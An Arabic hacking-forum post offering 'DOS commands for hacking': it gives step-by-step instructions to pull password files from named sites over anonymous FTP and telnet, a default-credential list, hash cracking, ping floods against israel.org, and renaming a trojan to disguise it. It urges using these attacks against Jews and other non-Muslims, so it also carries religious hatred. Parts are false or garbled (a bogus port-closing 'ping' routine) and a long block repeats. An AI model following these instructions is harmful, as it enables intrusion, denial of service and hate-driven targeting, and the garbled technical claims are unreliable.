أوامر dos للإختراق

    تمر دردشة الساحة الخاصة بالمتصفح والموبايل بفترة صيانة دورية هذا ونعتذر للجميع على الإنقطاع المؤقت بإمكانكم المشاركة في المنتدى لحين عودتها :)

    • أوامر dos للإختراق

      لكي تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع

      User name-Password

      وهما يكونان محفوظين في ملف يسمي

      PASSWDغالبا

      بعض المواقع تضع هذا الملف في الإف تي بي

      ما هو إف تي بي؟

      FTP=File Transfer Protocol بروتوكول نقل الملفات تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت

      ·start==>run إبدأ ثم تشغيل

      واكتب telnet

      سيفتح التلنت اضغط علىRemote System ==> connect

      ثم اكتب الموقع في Host Name مثلا

      kahane.org أو الآيبي الخاص به

      وفي PORT اكتب 21 وهو البورت الخاص بالإف تي بي

      ثم اضغط connect

      وبعد أن يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code

      user anonymous

      ثم انتر بعدها يطلب السيرفر كلمة السر اكتب

      pass zzzoozz@yahoo.com

      اكتب أي بريد ككلمة سر وطبعا سيكون وهميا

      ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح..

      بعدها سنحصل على ملف الباسوورد

      قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل

      cute ftp - ws_ftp

      مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان

      ftp.kahane.org

      لتحصل على الملف في التلنت اكتب

      retr /etc/passwd

      /etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع

      Sunos 5.0 etc/shadow او etc/passwd
      Linux etc/shadow او etc/passwd
      BSD4.3 -RENO etc/master.passwd
      AIX etc/security/passwd
      NT ويندوز scripts/passwd

      وتختلف أسماء ملف الباسوورد بين passwd و admin.pwl و غيرها

      أغلب استخدامات الدوز والمعروفة

      1-command هذا الامر يدخلك الى موجه الدوس .
      2-regedit هذا الامر لمحرر سجل الوندووز ( الشجرة ) .
      3·-icwscrpt هذا الامر خاص بنسخ ملفات الـ dll
      4-scandskw هذا الامر لعمل تفحص للاقراص .
      5-imgstart هذا الأمر لتشغيل قرص ويندووز المضغوط
      6-msiexec حقوق تركيب ويندووز .
      7- : d : c للوصول السريع إلى الدرايفرات
      8-hwinfo /ui لمعرفة معلومات عن جهازك وفحصه بالكامل عن طريق الدوس واعداد تقرير بذلك
      9-cleanmgr وهذا الامر يشغل برنامج تنظيف القرص
      10-packager وهذا الامر لبرامج يغير الايقونات
      11-recent هذا الامر لإستعراض ملف المستندات ( الموجود في قائمة إبدأ
      12-- sysedit هذا الامر(لفتح محرر تكوين النظام) لويندوز 98. حيث يقوم بفتح هذه النوافذ الخمسة التالية :
      protocol.ini
      system.ini
      win.ini
      config.sys
      autoexec.bat
      13-sfc وهذا الامر لإسترجاع بعض ملفات الـ dll عندما تتلف
      14-taskman وهذا الامر لمشاهدة البرامج التي تعمل حاليا
      15-debug لمعرفة نوع كرت الفيديو او الشاشة
      16-DEFRAG لإلغاء تجزئة القرص
      17-DVDPLAY مشغل افلام dvd يعمل مع ملينيوم
      18-winipcfg لمعرفة IP
      19-TEMP للوصول الى ملفات الويندوز المؤقتة
      20-- tuneup هذا الامر لتشغيل برنامج معالج الصيانة
      21-mobsync هذا الامر لظهور برنامج تنزيل الصفحات من الانترنت و تصفحها بدون اتصال
      22-cdplayer هذا الامر لتشغيل برنامج قاريء الأقراص المضغوطة
      23-ftp هذا الامر لجلب البرامج بسرعه من الدوس .
      24-Tips.txt هذا الأمر يظهر بعض أسرار ويندووز 98
      25-- telnet وهذا الامر يشغل برنامج telnet
      26-progman وهذا الامر يأخذك الى قائمة البرامج.
      27-drwatson أداة لتشخيص أخطاء النظام.
      28-cliconfg.
      29-- mkcompat.
      30-CVT1.EXE
      هذا الأمر لتشغيل معالج محول محركات الأقراص إلى نظامfat32
      31-SCANREG
      مدقق تسجيل ويندوزلتفحص التسجيل
      32-Tune up
      هذا الأمر لتشغيل معالج الصيانة ومن مهامه:
      1/ تسريع البرامج المستخدمة بشكل متكرر
      2/ تدقيق القرص الثابت لاستكشاف الأخطاء
      3/ حذف الملفات الغير ضرورية من الجهاز
      ويمكن استخدام هذا الأمر لنفس الغرض TUNEUP.EXE
      34-SYSEDIT
      محرر تكوين النظام لا ينصح بتغيير أي شيء فيها إلا من قبل الخبراء أو من لديهم معرفة تامة بالتعديلات التي يريدون عملها على هذا المحرر
      35-VCMUI
      أداة تعارض الإصدارة وظيفتها التحقق من الملفات التي لديها رقم إصدارة احدث أو كانت بلغة مختلفة قبل تثبيت النظام لاستعادتها
      شرح مبسط عن هذه الأداة:
      أثناء تثبيت برامج جديدة، بما فيها Windows 98، قد يتم الكشف عن الإصدار القديمة لملفات
      البرامج واستبدالها بالإصدار الجديدة. ويتم إنشاء نسخة احتياطية للإصدارات السابقة وتُحفظ
      على القرص الثابت.
      في حال وجدت تعارضات مع ملفات النظام أو ملفات البرامج بعد تثبيت تطبيق، تُستخدم إدارة تعارض
      الإصدار لاستعادة ملف النسخة الاحتياطية.
      وتذكر إدارة تعارض الإصدار كافة ملفات النسخة الاحتياطية، وتاريخ إجراء النسخة الاحتياطية،
      وأرقام الإصدار لملفات النسخة الاحتياطية والملفات الحالية. وعند استعادة ملف النسخة الاحتياطية،
      حينئذ، يتم إنشاء نسخة احتياطية للإصدار الحالي. ويبقى الإصداران متوفرين.
      ملاحظة مهمة : يجب استخدام هذه الأداة من قبل شخص لديه معرفة متقدمة بالنظام
      36-UPWIZUN
      إلغاء تثبيت معالج التحديث وظيفته كالتالي:
      ربما قد استخدمت Windows Update لتثبيت إصدار محدّث من أداة تصحيح،
      أو برنامج تشغيل، أو أداة نظام. إذا قررت فيما بعد إلغاء تثبيت الإصدار الجديد،
      ولم تتمكن من إعادة تأسيس الاتصال بإنترنت، استخدم إلغاء تثبيت معالج التحديث
      للعودة إلى الإصدار السابق.
      37-Asd.exe
      أداة تشغيل عامل برنامج تشغيل التخطي التلقائي
      وظيفته: يعرّف برنامج تشغيل التخطي التلقائي (ASD) حالات الفشل
      التي تسببت في توقف Windows عن الاستجابة في عمليات بدء التشغيل السابقة
      ويضع عليها علامات بحيث يتم تجاوزها في عمليات بدء التشغيل اللاحقة.
      يذكر ASD كافة الأجهزة أو العمليات التي فشل بدء تشغيلها. ويمكنك استخدام ASD لتمكين
      أي جهاز تم تعطيله سابقاً بواسطة ASD، وسيحاول Windows استخدام الجهاز
      في محاولة بدء التشغيل التالية. وفي حال الفشل، يتوقف الكمبيوتر عن الاستجابة.
      وعند إعادة تشغيل الكمبيوتر مرة أخرى، يمنع ASD تشغيل العملية سامحاً لك ببدء تشغيل الكمبيوتر

      الدوس هو برنامج يأتي مع الويندوز وهو عبارة عن مواجهه خطية يتلقى الأوامر من المستخدم ويقوم بتنفيذها.هذا باختصار
      والهكر عن طريق الدوس(DOS) له تأثير مرعب وقوي جداً وهذه بعض أوامر الدوس حتى نتعرف عليه أكثر:-
      لتشغيل الدوس إذهب إلى إبدأ>تشغيل>وأكتب command أو (start>run
      1-أكتب الأمرmsconfig لمعرفة البرامج اللتي تعمل وقت التشغيل او عند بدء التشغيل ولتتجنب الاختراق يمكنك عن طريق هذا الامر ثم إذهب إلى بدء التشغيل وانظر الى البرامج العامله وقم باطفاء أي برنامج غريب يعمل عند بدء التشغيل.
      2- الأمر Control لفتح لوحة التحكم .
      3- الأمر telnet لفتح نافذة التلنت والاتصال بجهاز بعيد بمعرفة الاي بي والبورت.
      4- الأمر ping israel.org/ لمعرفة IP الموقع ويستعمل في الهجوم ضد الموقع. ملاحظه/هناك مسافه بين ping http. يمكنك تغير (israel.org) بأي موقع.
      5- الأمر ping -twww.israel.org لارسال رسايل تتسبب في انهيار الموقع عند اجتماع الكثير من المستخدمين على القيام بها ضد موقع معين .
      6- الأمر netstat -n لاظهار IP أي شخص انت ترسل له ملف عبر الماسنجر اكتب هذا الامر بينما انت ترسل وسيظهر IP تبعه في موجة الدوس والاي بي تبعك انت ايضا.
      7- الأمر winipcfg لمعرفة IP الخاص بك.
      8- الأمر System.ini انظر الى السطر السادس ولابد ان يكون هكذا user.exe=user.exe والا فجهازك مخترق
      9- الأمر regedit ثم اتبع الاتي

      HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>Curr entVersion>Run واي ملف يحمل امتداد exe واسمه name قم بحذفه فهو الباتش تقريبا .

      اما بخصوص بينق تدمير المواقع فهي كالتالي:-
      1-ping israel.org/ لمعرفة IP الموقع.
      2-ping -t israel.org/ يحمل الضغط على الموقع المستضيف.
      3-ping -t -a -f israel.org/ يقوم بإعطاء أوامر إلى المستضيف.
      4-ping -w timeout israel.org/ قوم بتوضيح سرعة الموقع الحالية.

      10- كيف تستخدم اوامر الدوس في بعض الهجوم
      con/con.wav
      com1/com1.wav
      com2/com2.wav
      التفاصيل هنا

      طريقة تغيير امتداد exe عن طريق الدوس جديد

      اتبع الخطوات التالية:-
      إبدأ>تشغيل>وأكتب command أو (start>runcopy server.exe server.com طبعا server هو اسم الباتش تبعك وممكن تغير الامتداد الى com,scr,bat إخواني المسلمين لاتستخدموا هذه الطريقة ضد إخوانكم المسلمين وانما استخدموها ضد الكفار كما هو هدف الموقع وبخوصا اليهود قاتلهم الله ولعنهم.

      ()()(هجوم الدوز المخيف)()(


      هجوم DOS هو واحد من أخطر أنواع الهجمات الموجودة في الفضاء الافتراضي، وهو يكلف عالم الأعمال ملايين الدولارات كل عام، كما يشكل تهديداً حقيقياً لأي نظام أو شبكة موجودة على طريق المعلومات السريع، تتعلق هذه التكلفة بزمن تعطل النظام، ضياع الموارد، والعمل الفيزيائي اللازم لتحليل والرد على هذا النوع من الهجوم.

      ليس المقصود بـ DOS نظام التشغيل الشهير من مايكروسوفت، إنما المقصود هو هجوم رفض الخدمة Denial of Service Attack ، حيث يقوم المخترق بهذا الهجوم بهدف التخريب والتدمير، وهو لا يحتاج إلى مهارة عالية أو معرفة تقنية عميقة لأن الأدوات الضرورية متاحة ويمكن بسهولة تحميلها من الإنترنت.

      أصابت هجمات DOS العديد من المواقع المهمة والضخة مثل CNN, Yahoo, Bay, ZDNet…. وغيرها، مما أدى إلى توقفها تماماً عن العمل لفترات مختلفة، حدث ذلك في شهر فيبراير من العام 2000.

      يعتمد هذا الهجوم على استغلال نقاط الضعف في بروتوكول (TCP/IP) المصمم للعمل أساساً في بيئة آمنة مفتوحة، مما جعله يحوي العديد من الثغرات التي يمكن أن يستخدمها المخترقين Crackers.

      من المفارقات في هذا الموضوع أن المخترقين المحترفين وحتى المخربين منهم يعتبرون هذا النوع من الهجوم أنه رديئ ويسخرون ممن يقومون به باعتباره أنه اسلوب المبتدئين، ولا يحتاج إلى معرفة وخبرة.
      يوجد العديد من أنواع الهجوم DOS سوف أحاول أن أسردها باختصار:
      1-استهلاك عرض الحزمة Baud rate consumption
      حيث يقوم المهاجم باستهلاك كامل عرض الحزمة في نظام شبكة الضحية وذلك باغراق شبكة الضحية بكمية هائلة من الطلبات مثل: GET, SYN... وغيرها، مما يؤدي إلى استهلاك كامل عرض الحزمة وإيقاف الموقع المستهدف أو النظام المهاجم تماماً عن العمل، ويكون ذلك إما بالهجوم مباشرة Direct Attack حيث ينتصر في هذه الحالة من لديه عرض حزمة أكبر ( مثلاً 56-Kbps في مواجهة 128-Kbps )، أو القيام بربط العديد من المواقع من أجل إغراق نظام الضحية حيث يقوم المهاجم باستخدام أنظمة البث broadcast في شبكات أخرى من أجل تضخيم الهجوم، ويستفيد في هذه الحالة من عرض حزمة تلك الشبكة.
      من الجدير بالذكر في هذا الصدد أن برنامج الدرة من عمران يستخدم هذا النمط من الهجوم، على الرغم من أنني لم أقم بعد بتحليله كاملاً بعد، إلا أنني أستطيع القول من التحليل المبدئي على أنه يقوم بارسال طلبات GET حسب بروتوكول HTTP إلى النظام المستهدف وهو في هذه الحالة Web server مما يؤدي إلى زيادة الحمل على المزود المستهدف، يقوم البرنامج بذلك عن طريق إنشاء عدة Threads تعمل كل منها على أنها Process مستقلة تقوم بارسال طلبات GET المذكورة، إن فعالية هذا الهجوم قليلة حيث أن المستخدم مهما استخدم من عرض الحزمة لديه فلن يتمكن أبدا من مجاراة عرض حزمة المواقع الكبيرة، إلا أن القوة الحقيقية تكون عند التنسيق بين المئات أو الآلاف من مستخدمي هذا البرنامج بحيث يتم الهجوم على هدف محدد في وقت معين بدقة، وهذا مايقوم به برنامج الدرة حيث أنه يقوم بالاتصال بالموقع xxxxx.xxx (الموقع ليس سريا ويمكن بسهولة معرفته إلا أنني لن أذكره إلا إذا رغب عمران بذلك) ويحصل منه على أهداف الهجوم، ثم يقوم بالهجوم. (شكرا لـ Sp@nder على تزودي بنسخة من برنامج الدرة).

      2-استهلاك الموارد: هذا النوع من الهجوم يعتمد على استهلاك الموارد في نظام الضحية عوضا عن استهلاك عرض الحزمة. أهم الموارد التي يتم استهدافها هي: CPU, Memory, Kernel, File system ... وغيرها، و يؤدي انخفاض الموارد في النظام إلى عدم استقراره وانهياره في نهاية الأمر.

      3- الثغرات البرمجية أو في مكونات النظام:
      لا يوجد نظام أو برنامج خالي تماماً من الثغرات مهما بلغت دقة تصميمه، يوجد عدة طرق لاستغلال هذه الثغرات مثلا بارسال Packets غير متوفقة مع المعايير القياسية لـ بروتركول TCP/IP المحددة من قبل RFC إلى نظام الضحية مما يؤدي إلى نتائج تختلف حسب نوع البرنامج من توقف الخدمة، أو توقف النظام، أو ضياع المعلومات، أو فيضان المكدس stack وغير ذلك.
      والأسوأ من هذا استخدام الثغرات الموجودة ضمن المكونات الصلبة للنظام Hardware مثل ثغرة Pentium f00f DOS الشهيرة، حيث يؤدي تنفيذ شفرة الآلة opcode التالية 0xf00fc7c8 على أنظمة تعتمد معالجات بنتيوم إلى توقف النظام عن العمل تماماً.
      لسوء الحظ لا يمكن الكشف عن هذا النوع من الثغرات إلا بعد وقوع الهجوم. ولا أحد يعلم تماماً فيما إن كانت هذه الثغرات موجودة عن طريق الخطأ أم أنها موضوعة هناك عن عمد لسبب ما...... ؟؟؟؟؟!!!!!!! الله أعلم

      كما يوجد أنواع أخرى من هجمات DOS إلا أنها أقل فعالية وغير مستخدمة على نطاق واسع.


      كنت أنوي أن أتحدث عن طرق الحماية من هجوم رفض الخدمة إلا أن الموضوع طويل ويحتاج إلى عدة مقالات لمناقشته، إلا أن المهم بالنسبة للمستخدم المنزلي هو إخفاء رقم IP الخاص به واستخدام أحد برامج الجدران النارية مثل ZoneAlarm, PcConseal ...وغيرها، وطبعا أخذ الحذر في مواقع المنتديات والدردشة وخاصة منتدى الشبكات والسيرفرات في موقع فلاشيات ;)


      مايتطسع فعله netstat
      NETSTAT حالة الشبكة يظهر جميع المنافذ المتصلة
      NETSTAT مسافة-A يظهر ارقام الايبي المتصلة وحالتها
      NETSTAT مسافة-E يظهر حالة الشبكة بشكل عام
      NETSTAT مسافة-N يظهر ارقام البورتات والايبيات المتصلة
      NETSTAT مسافة-P يظهر البروتوكولات المتصلة بجهازك
      NETSTAT مسافة-R يظهر اجهزة الروترز في شبكتك
      NETSTAT مسافة-S يظهر حالة الشبكة والاجهزة المتصلة


      درس مهم لتعلم الاختراق بالtelnet
      nor2000.com/telnet.htm

      درس مهم لتعلم الاختراق بالnetbios
      nor2000.com/Logon.htm



      FTP
      أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البورت
      21
      مفتوح و هو البورت الخاص بــ
      FTP
      و لتأكد من أن البورت مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من احسنها
      Superscanne
      بعدما تتأكد ان البورت مفتوح ننتقل الى الخطوة الثانية و هي
      إضغط على
      Start
      ثم
      Run
      ثم اكتب
      ftp -n
      تطلع لك نافدة في الدوس مكتوب عليها
      FTP&g
      لحد هنا كل شيء تمام
      و بعدين اكتب
      Open
      ثم إضغط على
      إدخال
      Enter
      تتحصل عب النتيجة التالية
      FTP&g
      To
      أكتب جنب
      To
      رقم IP الضحية ثم إضغط على إدخال
      و الحين اهم جزء

      إدا تحصلت على هذا الرد فقد تخطيت خطوة
      Connected to assassin.com/
      220 websrv1 Microsoft FTP Service (Version 4.0).
      و الآن أكتب الكتابة التالية
      ftp&gquote user ftp
      إدا تحصلت على هذا الرد فقد تخطيت خطوة
      331 Anonymous acces allowed, send identify (e-mail name) as password.
      و الآن أكتب الكتابة التالية
      ftp&gquote cwd ~root
      إدا تحصلت على هذا الرد فقد تخطيت خطوة
      530 Please login with USER and PASS
      ثم أكتب الكتابة التالية
      ftp&gquote pass ftp
      إدا تحصلت على هذا الرد فقد تخطيت خطوة
      و نجحت في الإقتحام يعني الاختراق

      230 Anonymous user logged in.
      مبرووووك انت الحين في جهاز المسكين ذا الي بتحوسه
      ما عليك الآن الا ان تقوم بإستعمال
      اوامر الفتيبي
      و طبعا لن امر عليها مرور الكرام لكي لا تقعو في المشكلة الي وقعت فيها و هي نجاح الإقتحام من دون ما أعرف و لا فكرة على اوامر الفتيبي و إذا اردتم ان تضحكو بقاليأكثر من 20 دقيقة و انا مجمد الإيدي و الضحية عالقة من دون أن أعمل أي شيء وعشان كذا
      قمت وجبت الاوامرعشان تطبقوها مباشرةا بعد نجاح الاختراق

      Pwd
      لكي تعر ما يحتويه الهارد ديسك
      Cd
      لإقتحام مجلد مثال
      Cd black
      في هدا المثال قمت بإقتحام مجلد المسمى بلاك
      Ls
      لكي يتضح لك محتوى المجلد أو الهارد ديسك
      Get
      لكي تحمل الى سطح المكتب بتاع جهازك
      مثال
      Get black.exe
      Put
      العملية الع**ية ل
      Get
      يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في
      في جهاز الضحية
      مثال
      Put black.exe
      Clos
      لقطع الإتصال مع الضحية


      هذا أهم الأوامر والحين ابعلمكم على أنواع الرسائل الي نتحصل عليها من جهاز الضحية مع تطبيق الأوامر و شرحها و ارقامها
      Codes: Signification:
      110 Restart marker reply.
      120 Service ready in nnn minutes. (nnn est un temps)
      125 Data connection already open; transfer starting.
      150 File status oka about to open data connection.
      200 Command okay.
      202 Command not implemented, superfluous at this site.
      211 System status, or system help reply.
      212 Directory status.
      213 File status.
      214 Help message.
      215 NAME system type.
      220 Service ready for new user. 221 Service closing control connection.
      225 Data connection open; no transfer in progress.
      226 Closing data connection.
      227 Entering passive mode (h1, h2, h3, h4, p1, p2).
      230 User logged in, proceed.
      250 Requested file action okay, completed.
      257 "PATHNAME" created.
      331 User name okay, need password.
      332 Need account for login.
      350 Requested file action pendingfurther information.
      421 Service not available, closing control connection.
      425 Can't open data connection.
      426 Connection closed; transfer aborded.
      450 Requested file action not taken. (Fichier déjà utilisé par autre chose)
      451 Requested action aborded: local error processing.
      452 Requested action not taken. (Pas assez de mémoire pour exécuter l'action)
      500 Syntax error, command unrecognized.
      501 Syntax error in parameters or arguments.
      502 Command not implemented.
      503 Bad sequence of commands.
      504 Command not implemented for that parameter.
      530 Not logged in.
      532 Need account for storing files.
      550 Requested action not taken. (Fichier non trouvé, pas d'accès possible,...)
      551 Requested action aborded: page type unknown.
      552 Requested file action aborded.
      553 Requested action not taken. (Nom de fichier non attribué)


      Telnet
      ما هي التيل نت ؟
      التيل نت هي أداة قديمة في لينوكس(Linux) وينوكس(Unix) وأصبحت الآن موجودة في ويندوز .
      كيف يتم استخدامها سابقا ؟
      كانت تستخدم للتصفح بحيث ان مواقع الانترنت كانت مجرد نصوص بدون صور ... تخيل كم كانت الشبكة كئيبة ...
      كيف يتم استخدامها الآن ؟
      1 ــ قراءة بريدك الالكتروني بالطريقة التالية :
      اذهب إلى متصفحك واكتب telnet://hotmail.com:25/ وسوف يطلب اسم مستخدم وكلمة مرور(طبعا بعد ان يفتح التيل نت) ضع اسم بريدك وكلمة السر الخاصة بك واقرأ بريدك واتخدم الأمر Del msg#1 لحذف الرسالة الأولى وغير الرقم 1 برقم الرسالة المراد حذفها .

      2 ــ اختراق الأجهزة :
      ولها نفس الفكرة بحيث تقوم بالاتصال بجهاز على اساس انه سيرفر بإمكانك حذف \ إضافة \ إزالة الملفات فيه ...
      تتم أيضا بنفس الطريقة من متصفحك اكتب telnet://ipnumberort/ حيث أن IPNumber هو رقم الآي بي الخاص بالضحية اما port هو رقم المنفذ القابل لإجراء التيل نت عليه وهو يفترض أن يكون أحد المنافذ التالية :
      21 - 25 - 32(الأساسي) - 99 - 2001
      والعديد العديد من المنافذ الأخرى وهذه فقط على سبيل المثال

      3 ــ اختراق المواقع :
      يجب أن يكون في الموقع منفذ قابل للتيل نت(قم باستخدام ShadowSecurityScanner لهذا الغرض) تجده في موقع packetstorm.securify.com/ قم بالضغط على الوصلة التي سوف تظهر لك ثم ابحث عن البرنامج باسمه أو باسم SSS .
      المهم بعد ما تتصل بالتيل نت للموقع حاول أن تدخل باي يوزنيم او باسوورد من التالية أو غيرها :
      اسم المستخدم : كلمة المرور
      anonymous : anonymous
      guest : guest
      root : root
      sys : sys
      sys : sysadm
      sys : system
      games : games
      ftp : ftp
      mail : mail
      وإن لم تنجح(في حال كون نظام التشغيل في السيرفر ينوكس Unix ويمكنك معرفته بواسطة البرنامج المذكورة أعلاه) جرب التالية :
      young
      test
      لاحظ أنها غير محمية بكلمة سر وتسمى unpassworded accounts
      أي الحسابات الغير محمية بكلمة سر .
      اكتب الأمر :
      GET /etc/passwd و GET /etc/group و GET /etc/shadow
      ملاحظة : بعد كتابة كل أمر يجب أن تظيف :
      data = download
      لكي تتمكن من التحكم بالملفات .


      ماهو الملف psswd ?
      الملف ذا فضيحة فيه باسوورد صاحب الموقع ...وباسووردات غيرها بكثير من ظمنها باسوورد الـroot .
      ملاحظة للمبتدئين : الـroot هو الشخص الذي يستطيع التحكم بكل شيء وتخريب وتدمير كل شيء من دون أن يوقفه النظام وبإمكانه أن يكون أي مستخدم على الشبكة بواسطة الأمر su username ولن يحتاج إلى باسوورد .
      هذا الملف في ثلاث حالات :
      1 ــ مغير اسمه وصعبة نبحث لان الملفات الموجودة في الملف etc/ كثيرة جدا .
      2 ــ معمول له shadow وليس هناك طريقة لفك الـshadow أو ما يسمى بـunshadow .
      3 ــ متروك مثل ما هو ..
      لنفترض أنه كان في الحالة الثالثة هل ستجد الباسووردات بسهولة ؟؟ لا وألف لا
      الباسووردات مشفرة ... سوف تراها كالمثال التالي :
      sirhack:89fGc%^7&a, Ty:100:100: Sir Hackalot: /usr/sirhack:/bin/sh
      هنا سوف نعرف المعلومات التالية:
      1 ــ اسم المستخدم : sirhack .
      2 ــ كلمة السر : 89fGc%^7 .
      3 ــ الاسم الحقيقي : Sir Hackalot .
      4 ــ مجلد الحساب : usr/sirhack/
      5 ــ الغلاف(هنا الكلام في ينوكس او لينوكس) : bin/sh/
      كما رأيتم فكلمة السر مشفرة .

      ما هو الملف group ?
      هذا الملف يحوي اسماء المستخدمين مع كلمة السر(مشفرة ثانية) وحالاته نفس حالات الملف passwd إلا أنه لا يغير تسميته .

      ما هو الملف shadow ?
      في حالة كون الملف psswd مشفر سوف نحتاج إلى هذا الملف لانه لن يكون مشفرا ...

      كيف أفك التشفير ؟
      استخدم أحد برنامجين :
      1 ــ Cracker Jack .
      2 ــ John the ripper .
      وكلهما يوجد منهما نسخة لويندوز ونسخة للينوكس(وينوكس) ...

      نسخة اللينوكس
      openwall.com/john/john-1.6.tar.gz

      نسخة الويندوز
      openwall.com/john/john-16w.zip

      إغلاق المنافذ port الموجودة بالجهاز

      اول شيء بقوله انه الكثير منا قد يتخوف من الهاكر واكثر البرنامج ( الفايرول ) الجدار الناري قد تفى بالغرض ولكن لو لم تستخدم بطريقه سليمه فيكون وجودها مثل عدمها ......

      اقدم لكم هذه الطريقه التى عن طريقها تستطيع تقفيل جميع البورتات ( الثغرات الامنيه ) الموجوده بكل الاجهزه .


      اتمنى اتباع الطريقه كما هي :
      إدهب إلى:
      Start&gRun ابداء &l تشغيل

      واكتب الامر التالي
      command.com

      ستظهر لك نافذة إكتب فيها:
      ping host

      و إضغط enter ثم إنتظر و اكتب:
      ping port


      و إضغط enter

      ثم إنتظر و اكتب:
      ping port1027
      وإضغط enter
      و إنتظر ثم إكتب:
      ping port80


      و إضغط enter
      ثم اكتب:
      ping
      و إضغط enter

      ثم اكتب:
      ping port
      و إضغط enter


      و الآن إنتهت المهمة.. لقد قمت بتقفيل بورت في ال الخاص بك و لقد تم منع دخول الهاكرز من تلك الثغرة الأمنية.

      لكي تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع

      User name-Password

      وهما يكونان محفوظين في ملف يسمي

      PASSWDغالبا

      بعض المواقع تضع هذا الملف في الإف تي بي

      ما هو إف تي بي؟

      FTP=File Transfer Protocol بروتوكول نقل الملفات تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت

      ·start==>run إبدأ ثم تشغيل

      واكتب telnet

      سيفتح التلنت اضغط علىRemote System ==> connect

      ثم اكتب الموقع في Host Name مثلا

      kahane.org أو الآيبي الخاص به

      وفي PORT اكتب 21 وهو البورت الخاص بالإف تي بي

      ثم اضغط connect

      وبعد أن يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code

      user anonymous

      ثم انتر بعدها يطلب السيرفر كلمة السر اكتب

      pass zzzoozz@yahoo.com

      اكتب أي بريد ككلمة سر وطبعا سيكون وهميا

      ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح..

      بعدها سنحصل على ملف الباسوورد

      قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل

      cute ftp - ws_ftp

      مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان

      ftp.kahane.org

      لتحصل على الملف في التلنت اكتب

      retr /etc/passwd

      /etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع

      Sunos 5.0 etc/shadow او etc/passwd
      Linux etc/shadow او etc/passwd
      BSD4.3 -RENO etc/master.passwd
      AIX etc/security/passwd
      NT ويندوز scripts/passwd

      وتختلف أسماء ملف الباسوورد بين passwd و admin.pwl و غيرها

      أغلب استخدامات الدوز والمعروفة

      1-command هذا الامر يدخلك الى موجه الدوس .
      2-regedit هذا الامر لمحرر سجل الوندووز ( الشجرة ) .
      3·-icwscrpt هذا الامر خاص بنسخ ملفات الـ dll
      4-scandskw هذا الامر لعمل تفحص للاقراص .
      5-imgstart هذا الأمر لتشغيل قرص ويندووز المضغوط
      6-msiexec حقوق تركيب ويندووز .
      7- : d : c للوصول السريع إلى الدرايفرات
      8-hwinfo /ui لمعرفة معلومات عن جهازك وفحصه بالكامل عن طريق الدوس واعداد تقرير بذلك
      9-cleanmgr وهذا الامر يشغل برنامج تنظيف القرص
      10-packager وهذا الامر لبرامج يغير الايقونات
      11-recent هذا الامر لإستعراض ملف المستندات ( الموجود في قائمة إبدأ
      12-- sysedit هذا الامر(لفتح محرر تكوين النظام) لويندوز 98. حيث يقوم بفتح هذه النوافذ الخمسة التالية :
      protocol.ini
      system.ini
      win.ini
      config.sys
      autoexec.bat
      13-sfc وهذا الامر لإسترجاع بعض ملفات الـ dll عندما تتلف
      14-taskman وهذا الامر لمشاهدة البرامج التي تعمل حاليا
      15-debug لمعرفة نوع كرت الفيديو او الشاشة
      16-DEFRAG لإلغاء تجزئة القرص
      17-DVDPLAY مشغل افلام dvd يعمل مع ملينيوم
      18-winipcfg لمعرفة IP
      19-TEMP للوصول الى ملفات الويندوز المؤقتة
      20-- tuneup هذا الامر لتشغيل برنامج معالج الصيانة
      21-mobsync هذا الامر لظهور برنامج تنزيل الصفحات من الانترنت و تصفحها بدون اتصال
      22-cdplayer هذا الامر لتشغيل برنامج قاريء الأقراص المضغوطة
      23-ftp هذا الامر لجلب البرامج بسرعه من الدوس .
      24-Tips.txt هذا الأمر يظهر بعض أسرار ويندووز 98
      25-- telnet وهذا الامر يشغل برنامج telnet
      26-progman وهذا الامر يأخذك الى قائمة البرامج.
      27-drwatson أداة لتشخيص أخطاء النظام.
      28-cliconfg.
      29-- mkcompat.
      30-CVT1.EXE
      هذا الأمر لتشغيل معالج محول محركات الأقراص إلى نظامfat32
      31-SCANREG
      مدقق تسجيل ويندوزلتفحص التسجيل
      32-Tune up
      هذا الأمر لتشغيل معالج الصيانة ومن مهامه:
      1/ تسريع البرامج المستخدمة بشكل متكرر
      2/ تدقيق القرص الثابت لاستكشاف الأخطاء
      3/ حذف الملفات الغير ضرورية من الجهاز
      ويمكن استخدام هذا الأمر لنفس الغرض TUNEUP.EXE
      34-SYSEDIT
      محرر تكوين النظام لا ينصح بتغيير أي شيء فيها إلا من قبل الخبراء أو من لديهم معرفة تامة بالتعديلات التي يريدون عملها على هذا المحرر
      35-VCMUI
      أداة تعارض الإصدارة وظيفتها التحقق من الملفات التي لديها رقم إصدارة احدث أو كانت بلغة مختلفة قبل تثبيت النظام لاستعادتها
      شرح مبسط عن هذه الأداة:
      أثناء تثبيت برامج جديدة، بما فيها Windows 98، قد يتم الكشف عن الإصدار القديمة لملفات
      البرامج واستبدالها بالإصدار الجديدة. ويتم إنشاء نسخة احتياطية للإصدارات السابقة وتُحفظ
      على القرص الثابت.
      في حال وجدت تعارضات مع ملفات النظام أو ملفات البرامج بعد تثبيت تطبيق، تُستخدم إدارة تعارض
      الإصدار لاستعادة ملف النسخة الاحتياطية.
